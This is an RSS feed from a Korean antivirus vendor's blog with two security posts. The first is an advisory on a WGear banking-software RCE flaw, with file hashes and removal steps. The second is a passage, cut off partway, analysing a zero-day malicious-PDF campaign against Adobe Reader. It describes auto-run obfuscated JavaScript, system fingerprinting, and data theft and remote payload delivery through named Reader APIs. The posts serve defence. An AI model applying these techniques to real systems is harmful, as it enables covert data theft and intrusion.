<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>이스트시큐리티 알약 블로그</title>
    <link>https://alyacofficialblog.tistory.com/</link>
    <description>이스트시큐리티 공식 블로그입니다. 이스트시큐리티는 AI 기술을 활용한 사이버 위협 인텔리전스의 선도 기업이 되겠습니다.</description>
    <language>ko</language>
    <pubDate>Sat, 18 Apr 2026 06:16:48 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>알약(Alyac)</managingEditor>
    <image>
      <title>이스트시큐리티 알약 블로그</title>
      <url>https://tistory1.daumcdn.net/tistory/1638807/attach/66ef962337cb4e999613553627d55396</url>
      <link>https://alyacofficialblog.tistory.com</link>
    </image>
    <item>
      <title>기업뱅킹 전자금융 소프트웨어(WGear) 취약점 관련 대응 안내</title>
      <link>https://alyacofficialblog.tistory.com/5746</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cE5LbI/dJMcacbGdzq/xxSoLAKJU7nBTmcBJL8Y91/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cE5LbI/dJMcacbGdzq/xxSoLAKJU7nBTmcBJL8Y91/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cE5LbI/dJMcacbGdzq/xxSoLAKJU7nBTmcBJL8Y91/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcE5LbI%2FdJMcacbGdzq%2FxxSoLAKJU7nBTmcBJL8Y91%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2026년&amp;nbsp;4월&amp;nbsp;9일&amp;nbsp;금융보안원(FSI)&amp;nbsp;및&amp;nbsp;KISA에서&amp;nbsp;&amp;ldquo;기업뱅킹&amp;nbsp;전자금융서비스에&amp;nbsp;설치되는&amp;nbsp;엑셀&amp;nbsp;대용량&amp;nbsp;처리&amp;nbsp;프로그램(WGear)의&amp;nbsp;보안&amp;nbsp;취약점에&amp;nbsp;대한&amp;nbsp;공지&amp;rdquo;를&amp;nbsp;발표하였습니다.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이와 관련하여 알약 백신의 탐지 대응 현황을 아래와 같이 안내드립니다.&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;margin: 40px 0 20px;&quot;&gt;
&lt;div style=&quot;font-size: 22px; font-weight: bold; color: #111; line-height: 1.3;&quot;&gt;■ 취약점 개요&lt;/div&gt;
&lt;div style=&quot;border-top: 1px solid #cfcfcf; margin-top: 10px;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;대상 소프트웨어: 엑셀&amp;nbsp;대용량&amp;nbsp;처리&amp;nbsp;프로그램(WGear)&amp;nbsp;&lt;b&gt;1.100.10&amp;nbsp;버전&amp;nbsp;이하&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;취약점 유형: &lt;b&gt;원격 코드 실행&amp;nbsp;&lt;/b&gt;(Remote&amp;nbsp;Code&amp;nbsp;Execution,&amp;nbsp;RCE)&lt;/li&gt;
&lt;li&gt;해결 버전: &lt;b&gt;v1.100.11&amp;nbsp;이상&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;margin: 40px 0 20px;&quot;&gt;
&lt;div style=&quot;font-size: 22px; font-weight: bold; color: #111; line-height: 1.3;&quot;&gt;■ 알약 백신 탐지 현황&lt;/div&gt;
&lt;div style=&quot;border-top: 1px solid #cfcfcf; margin-top: 10px;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;취약한 버전의 파일에 대해 아래와 같은 정보로 탐지하고 있으며, 해당 항목이 탐지된 경우 취약한 버전의 프로그램이 설치된 경우 이므로 해당 프로그램 자체를 제거 또는 최신버전으로 업데이트 하시기 바랍니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 72px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 39.3024%; height: 21px; text-align: center;&quot;&gt;&lt;b&gt;해쉬값(MD5)&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 17.6743%; height: 21px; text-align: center;&quot;&gt;&lt;b&gt;파일버전&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 22.0931%; height: 21px; text-align: center;&quot;&gt;&lt;b&gt;알약 탐지명&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20.9302%; height: 21px; text-align: center;&quot;&gt;&lt;b&gt;업데이트 일자&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 39.3024%; height: 17px; text-align: center;&quot;&gt;2579344BB551B90D2C067B2D65061551&lt;/td&gt;
&lt;td style=&quot;width: 17.6743%; height: 17px; text-align: center;&quot;&gt;1.100.2.22319&amp;nbsp; &lt;br /&gt;1.100.3.1115&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 22.0931%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;Misc.Riskware.WGear&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20.9302%; height: 17px; text-align: center;&quot;&gt;2026.04.14&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 39.3024%; height: 17px; text-align: center;&quot;&gt;C29A0595DCF7A03F4D2BDC525DA7534D&lt;/td&gt;
&lt;td style=&quot;width: 17.6743%; height: 17px; text-align: center;&quot;&gt;1.100.2.22320&amp;nbsp; &lt;br /&gt;1.100.3.1116&amp;nbsp; &lt;br /&gt;1.100.7.0205&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 22.0931%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;Misc.Riskware.WGear&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20.9302%; height: 17px; text-align: center;&quot;&gt;2026.04.09&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 39.3024%; height: 17px; text-align: center;&quot;&gt;D6899FCB2E3E20E0251483D9CDB51257&lt;/td&gt;
&lt;td style=&quot;width: 17.6743%; height: 17px; text-align: center;&quot;&gt;1.100.2.25091&amp;nbsp; &lt;br /&gt;1.100.10&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 22.0931%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;Misc.Riskware.WGear&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 20.9302%; height: 17px; text-align: center;&quot;&gt;2026.04.09&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;※ WGear&amp;nbsp;&amp;nbsp;프로그램 삭제 방법&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Windows&amp;nbsp;10:&amp;nbsp;[설정]&amp;nbsp;&amp;rarr;&amp;nbsp;[앱]&amp;nbsp;&amp;rarr;&amp;nbsp;[앱&amp;nbsp;및&amp;nbsp;기능]&amp;nbsp;메뉴에서&amp;nbsp;WGear&amp;nbsp;제거&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Windows 11: [설정] &amp;rarr; [앱] &amp;rarr; [설치된 앱] 메뉴에서 WGear 제거&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;margin: 40px 0 20px;&quot;&gt;
&lt;div style=&quot;font-size: 22px; font-weight: bold; color: #111; line-height: 1.3;&quot;&gt;&lt;br /&gt;■ 관련 보안 공지&lt;/div&gt;
&lt;div style=&quot;border-top: 1px solid #cfcfcf; margin-top: 10px;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;금융보안원 &lt;a href=&quot;https://sscs.fsec.or.kr/board/notice/019d6f6f-32d5-7d7f-9ed7-380884909b8a&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://sscs.fsec.or.kr/board/notice/019d6f6f-32d5-7d7f-9ed7-380884909b8a&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;KISA &lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000133&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=72023&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000133&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=72023&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;WGear&amp;nbsp;보안&amp;nbsp;조치&amp;nbsp;안내 &lt;a href=&quot;https://wtech.inswave.kr/wgear_guide/index.html?browser=Y&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://wtech.inswave.kr/wgear_guide/index.html?browser=Y&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description>
      <category>국내외 보안동향</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5746</guid>
      <comments>https://alyacofficialblog.tistory.com/5746#entry5746comment</comments>
      <pubDate>Tue, 14 Apr 2026 15:04:33 +0900</pubDate>
    </item>
    <item>
      <title>Adobe Reader 제로데이 취약점을 이용한 악성 PDF 공격 주의!</title>
      <link>https://alyacofficialblog.tistory.com/5745</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b2ERB0/dJMcaf7fWwd/a61h80CSlEHSMJmDruIHWK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b2ERB0/dJMcaf7fWwd/a61h80CSlEHSMJmDruIHWK/img.png&quot; data-alt=&quot;[이미지] 생성형 AI 제작&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b2ERB0/dJMcaf7fWwd/a61h80CSlEHSMJmDruIHWK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb2ERB0%2FdJMcaf7fWwd%2Fa61h80CSlEHSMJmDruIHWK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1536&quot; height=&quot;1024&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 생성형 AI 제작&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최신&amp;nbsp;버전의&amp;nbsp;Adobe&amp;nbsp;Reader&amp;nbsp;제로데이&amp;nbsp;취약점을&amp;nbsp;악용한&amp;nbsp;정교한&amp;nbsp;PDF&amp;nbsp;공격이&amp;nbsp;확인되었습니다.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;이번&amp;nbsp;공격은&amp;nbsp;단순한&amp;nbsp;악성코드&amp;nbsp;실행을&amp;nbsp;넘어,&amp;nbsp;피해자의&amp;nbsp;시스템&amp;nbsp;정보를&amp;nbsp;은밀하게&amp;nbsp;수집하고&amp;nbsp;이를&amp;nbsp;기반으로&amp;nbsp;후속&amp;nbsp;공격을&amp;nbsp;선별적으로&amp;nbsp;수행하는&amp;nbsp;'핑거프린팅(Fingerprinting)'&amp;nbsp;방식을&amp;nbsp;채택한&amp;nbsp;것이&amp;nbsp;특징입니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;해당 취약점은 현재 패치가 이루어지지 않은 제로데이 상태이며, 악성 PDF 파일만 열어도 공격이 트리거 된다는 점에서 사용자 개입 없이도 시스템 정보 탈취와 후속 원격 코드 실행(RCE)으로 이어질 수 있어 그 위험성이 매우 높습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;  참고하세요&lt;/p&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;핑거프린팅(Fingerprinting)&lt;/b&gt;: 공격 대상 시스템의 OS 버전, 설치된 소프트웨어 정보, 언어 설정 등 다양한 환경 정보를 수집해 '지문'처럼 식별하는 기법입니다. 공격자는 이를 통해 더 정밀한 후속 공격을 준비합니다.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;margin: 40px 0 20px;&quot;&gt;
&lt;div style=&quot;border-top: 1px solid #cfcfcf; margin-bottom: 10px;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;font-size: 22px; font-weight: bold; color: #111; line-height: 1.3;&quot;&gt;■ 공격 개요&lt;/div&gt;
&lt;div style=&quot;border-top: 1px solid #cfcfcf; margin-top: 10px;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번&amp;nbsp;공격에&amp;nbsp;사용된&amp;nbsp;악성&amp;nbsp;PDF&amp;nbsp;샘플은&amp;nbsp;2025년&amp;nbsp;11월&amp;nbsp;말에&amp;nbsp;처음&amp;nbsp;관찰되기&amp;nbsp;시작했으며,&amp;nbsp;이후&amp;nbsp;변종이&amp;nbsp;추가로&amp;nbsp;발견되는&amp;nbsp;등&amp;nbsp;최소&amp;nbsp;4개월&amp;nbsp;이상&amp;nbsp;지속된&amp;nbsp;APT(Advanced&amp;nbsp;Persistent&amp;nbsp;Threat)&amp;nbsp;캠페인의&amp;nbsp;일부로&amp;nbsp;분석됩니다.&amp;nbsp;최신&amp;nbsp;버전인&amp;nbsp;Adobe&amp;nbsp;Reader&amp;nbsp;26.001.21367에서도&amp;nbsp;동작이&amp;nbsp;확인되었습니다.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;특히&amp;nbsp;발견된&amp;nbsp;샘플&amp;nbsp;중&amp;nbsp;하나는&amp;nbsp;Invoice540.pdf(인보이스&amp;middot;청구서로&amp;nbsp;위장)&amp;nbsp;라는&amp;nbsp;파일명을&amp;nbsp;사용했으며,&amp;nbsp;내부에&amp;nbsp;러시아&amp;nbsp;석유&amp;middot;가스&amp;nbsp;산업&amp;nbsp;관련&amp;nbsp;내용을&amp;nbsp;담은&amp;nbsp;미끼&amp;nbsp;문서가&amp;nbsp;포함되어&amp;nbsp;있었습니다.&amp;nbsp;이를&amp;nbsp;통해&amp;nbsp;러시아&amp;nbsp;에너지&amp;nbsp;산업&amp;nbsp;관계자를&amp;nbsp;주요&amp;nbsp;표적으로&amp;nbsp;삼은&amp;nbsp;것으로&amp;nbsp;추정되고&amp;nbsp;있습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1379&quot; data-origin-height=&quot;720&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/O6ONd/dJMcadaucQ5/5wVn7kQruKHUcjOszBbBF1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/O6ONd/dJMcadaucQ5/5wVn7kQruKHUcjOszBbBF1/img.png&quot; data-alt=&quot;[그림 1] Invoice540.pdf 파일 실행 화면&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/O6ONd/dJMcadaucQ5/5wVn7kQruKHUcjOszBbBF1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FO6ONd%2FdJMcadaucQ5%2F5wVn7kQruKHUcjOszBbBF1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1379&quot; height=&quot;720&quot; data-origin-width=&quot;1379&quot; data-origin-height=&quot;720&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 1] Invoice540.pdf 파일 실행 화면&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;margin: 40px 0 20px;&quot;&gt;
&lt;div style=&quot;border-top: 1px solid #cfcfcf; margin-bottom: 10px;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;font-size: 22px; font-weight: bold; color: #111; line-height: 1.3;&quot;&gt;■ 악성 코드 구조 및 공격 흐름&lt;/div&gt;
&lt;div style=&quot;border-top: 1px solid #cfcfcf; margin-top: 10px;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;악성&amp;nbsp;PDF는&amp;nbsp;다단계&amp;nbsp;난독화&amp;nbsp;구조로&amp;nbsp;설계되어&amp;nbsp;분석과&amp;nbsp;탐지를&amp;nbsp;모두&amp;nbsp;회피합니다.&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;1단계 - 난독화된 JavaScript 자동 실행&lt;/b&gt; &lt;br /&gt;PDF를 여는 즉시, 별도의 클릭 없이 내부에 숨겨진 JavaScript가 자동 실행됩니다. 이 코드는 고도로 난독화되어 있으며, PDF 내 폼 오브젝트(btn1)에 Base64 형태로 저장된 추가 악성 코드를 꺼내 실행하는 구조입니다. 파일을 열어 검사하는 일반적인 탐지 방식으로는 악성 여부를 식별하기 어렵습니다.&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;2단계&amp;nbsp;-&amp;nbsp;시스템&amp;nbsp;핑거프린팅&amp;nbsp;(정밀&amp;nbsp;정보&amp;nbsp;수집)&amp;nbsp;&lt;/b&gt;&lt;br /&gt;악성 코드는 Adobe Reader에 내장된 API를 악용해 사용자 몰래 시스템 정보를 수집합니다. 수집되는 주요 정보는 다음과 같습니다.&lt;/li&gt;
&lt;/ul&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 119px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 22.6356%; height: 21px; text-align: center;&quot;&gt;수집항목&lt;/td&gt;
&lt;td style=&quot;width: 41.4729%; height: 21px; text-align: center;&quot;&gt;내용&lt;/td&gt;
&lt;td style=&quot;width: 35.8914%; height: 21px; text-align: center;&quot;&gt;공격자 활용 목적&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 30px;&quot;&gt;
&lt;td style=&quot;width: 22.6356%; height: 30px;&quot;&gt;Windows 버전&lt;/td&gt;
&lt;td style=&quot;width: 41.4729%; height: 30px;&quot;&gt;Windows 7/8.1/10/11 구분 및 세부 빌드 번호&lt;/td&gt;
&lt;td style=&quot;width: 35.8914%; height: 30px;&quot;&gt;버전별 맞춤형 후속 공격 준비&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 22.6356%; height: 17px;&quot;&gt;시스템 아키텍처&lt;/td&gt;
&lt;td style=&quot;width: 41.4729%; height: 17px;&quot;&gt;64비트 환경 여부&lt;/td&gt;
&lt;td style=&quot;width: 35.8914%; height: 17px;&quot;&gt;페이로드 종류 결정&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 22.6356%; height: 17px;&quot;&gt;Adobe Reader 정보&lt;/td&gt;
&lt;td style=&quot;width: 41.4729%; height: 17px;&quot;&gt;버전, 제품 종류(Reader/Pro), 언어 설정&lt;/td&gt;
&lt;td style=&quot;width: 35.8914%; height: 17px;&quot;&gt;취약점 공략 방식 선택&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 22.6356%; height: 17px;&quot;&gt;PDF 파일 경로&lt;/td&gt;
&lt;td style=&quot;width: 41.4729%; height: 17px;&quot;&gt;현재 열린 파일의 전체 저장 경로&lt;/td&gt;
&lt;td style=&quot;width: 35.8914%; height: 17px;&quot;&gt;파일 시스템 구조 파악&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 22.6356%; height: 17px;&quot;&gt;열린 문서 수&lt;/td&gt;
&lt;td style=&quot;width: 41.4729%; height: 17px;&quot;&gt;현재 Adobe에서 열려 있는 문서 개수&lt;/td&gt;
&lt;td style=&quot;width: 35.8914%; height: 17px;&quot;&gt;자동화된 분석 환경(샌드박스) 여부 추정&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 1] 수집되는 항목&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;3단계&amp;nbsp;-&amp;nbsp;정보&amp;nbsp;전송&amp;nbsp;및&amp;nbsp;추가&amp;nbsp;명령&amp;nbsp;수신&amp;nbsp;(RSS.addFeed&amp;nbsp;악용)&amp;nbsp;&lt;/b&gt; &lt;br /&gt;수집된 시스템 정보는 RSS.addFeed() API를 통해 공격자 서버로 전송됩니다. 이 API는 단순히 데이터를 보내는 것을 넘어, 서버로부터 추가 JavaScript 코드를 수신하여 실행하는 역할도 수행합니다. &lt;br /&gt;즉, 공격자는 피해자의 환경을 평가한 뒤 조건이 충족될 경우 원격에서 추가 악성 코드를 동적으로 주입할 수 있습니다.&amp;nbsp; &lt;br /&gt;악성 코드는 0.5초마다 서버 응답을 반복 확인하면서 페이로드 수신 기회를 모니터링하며, 서버에서 반환되는 페이로드는 네트워크 탐지를 우회하기 위해 AES 암호화된 형태로 전달됩니다.&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;margin: 40px 0 20px;&quot;&gt;
&lt;div style=&quot;border-top: 1px solid #cfcfcf; margin-bottom: 10px;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;font-size: 22px; font-weight: bold; color: #111; line-height: 1.3;&quot;&gt;■ 잠재적 피해 범위&lt;/div&gt;
&lt;div style=&quot;border-top: 1px solid #cfcfcf; margin-top: 10px;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번&amp;nbsp;취약점이&amp;nbsp;악용될&amp;nbsp;경우&amp;nbsp;발생&amp;nbsp;가능한&amp;nbsp;피해는&amp;nbsp;다음과&amp;nbsp;같습니다.&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;로컬&amp;nbsp;파일&amp;nbsp;탈취&amp;nbsp;&lt;/b&gt; &lt;br /&gt;util.readFileIntoStream()&amp;nbsp;API를&amp;nbsp;통해&amp;nbsp;Reader&amp;nbsp;프로세스가&amp;nbsp;접근&amp;nbsp;가능한&amp;nbsp;파일을&amp;nbsp;읽어&amp;nbsp;공격자&amp;nbsp;서버로&amp;nbsp;전송할&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;업무&amp;nbsp;문서,&amp;nbsp;설정&amp;nbsp;파일,&amp;nbsp;인증&amp;nbsp;정보가&amp;nbsp;포함된&amp;nbsp;파일&amp;nbsp;등이&amp;nbsp;대상이&amp;nbsp;될&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;시스템&amp;nbsp;환경&amp;nbsp;정보&amp;nbsp;유출&amp;nbsp;&lt;/b&gt; &lt;br /&gt;OS&amp;nbsp;버전,&amp;nbsp;Reader&amp;nbsp;버전,&amp;nbsp;언어&amp;nbsp;설정,&amp;nbsp;PDF&amp;nbsp;저장&amp;nbsp;경로&amp;nbsp;등&amp;nbsp;공격자의&amp;nbsp;후속&amp;nbsp;공격&amp;nbsp;설계에&amp;nbsp;활용될&amp;nbsp;수&amp;nbsp;있는&amp;nbsp;정밀한&amp;nbsp;환경&amp;nbsp;정보가&amp;nbsp;외부로&amp;nbsp;전송됩니다.&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;원격&amp;nbsp;코드&amp;nbsp;실행(RCE)&amp;nbsp;및&amp;nbsp;샌드박스&amp;nbsp;탈출(SBX)로&amp;nbsp;이어질&amp;nbsp;가능성&amp;nbsp;&lt;/b&gt; &lt;br /&gt;서버에서&amp;nbsp;반환되는&amp;nbsp;추가&amp;nbsp;JavaScript가&amp;nbsp;실행되는&amp;nbsp;구조상,&amp;nbsp;공격자가&amp;nbsp;적절한&amp;nbsp;조건을&amp;nbsp;만족하는&amp;nbsp;타깃을&amp;nbsp;식별할&amp;nbsp;경우&amp;nbsp;RCE&amp;nbsp;또는&amp;nbsp;SBX&amp;nbsp;익스플로잇을&amp;nbsp;동적으로&amp;nbsp;전달해&amp;nbsp;시스템&amp;nbsp;전체를&amp;nbsp;장악할&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;  참고하세요&lt;/p&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;RCE(Remote&amp;nbsp;Code&amp;nbsp;Execution,&amp;nbsp;원격&amp;nbsp;코드&amp;nbsp;실행)&lt;/b&gt;:&amp;nbsp;공격자가&amp;nbsp;피해자의&amp;nbsp;시스템에서&amp;nbsp;임의의&amp;nbsp;코드를&amp;nbsp;원격으로&amp;nbsp;실행할&amp;nbsp;수&amp;nbsp;있는&amp;nbsp;취약점입니다.&amp;nbsp; &lt;br /&gt;&lt;b&gt;SBX(Sandbox Escape, 샌드박스 탈출)&lt;/b&gt;: PDF 리더와 같은 애플리케이션은 보안을 위해 제한된 환경(샌드박스) 안에서 동작합니다. 샌드박스 탈출은 이 제한을 벗어나 시스템 전체에 접근하는 공격입니다.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;margin: 40px 0 20px;&quot;&gt;
